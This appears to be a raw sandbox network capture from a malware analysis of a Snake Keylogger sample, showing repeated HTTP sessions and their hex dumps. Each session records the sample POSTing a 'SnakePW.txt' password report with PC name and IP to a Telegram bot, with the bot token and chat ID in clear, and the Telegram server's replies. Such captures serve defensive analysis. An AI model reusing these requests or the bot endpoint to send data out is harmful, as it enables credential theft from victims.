                                                                    2022-06-26 07:33:07 UTC112INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66819,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228786,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    67192.168.2.549881149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:07 UTC113OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e56c9a34
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:07 UTC113OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 36 63 39 61 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e56c9a34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:07 UTC113INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:07 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:07 UTC114INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66820,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228787,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    68192.168.2.549884149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:07 UTC114OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e5a36ffb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:07 UTC115OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 61 33 36 66 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e5a36ffbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:07 UTC115INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:07 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:07 UTC116INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66822,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228787,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    69192.168.2.549888149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:07 UTC116OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e5d7e39b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:07 UTC116OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 64 37 65 33 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e5d7e39bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:08 UTC117INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:08 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:08 UTC117INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66823,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228788,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    7192.168.2.549775149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:41 UTC11OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d5f47c57
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:41 UTC12OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 66 34 37 63 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d5f47c57Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:41 UTC12INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:41 UTC13INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66753,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228761,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    70192.168.2.549890149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:08 UTC118OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e615e0c5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:08 UTC118OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 31 35 65 30 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e615e0c5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:08 UTC119INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:08 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:08 UTC119INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66824,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228788,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    71192.168.2.549893149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:08 UTC119OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e6517b64
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:08 UTC120OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 35 31 37 62 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e6517b64Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:08 UTC120INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:08 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:08 UTC121INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66826,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228788,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    72192.168.2.549895149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:09 UTC121OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e688517c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:09 UTC121OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 38 38 35 31 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e688517cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:09 UTC122INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:09 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
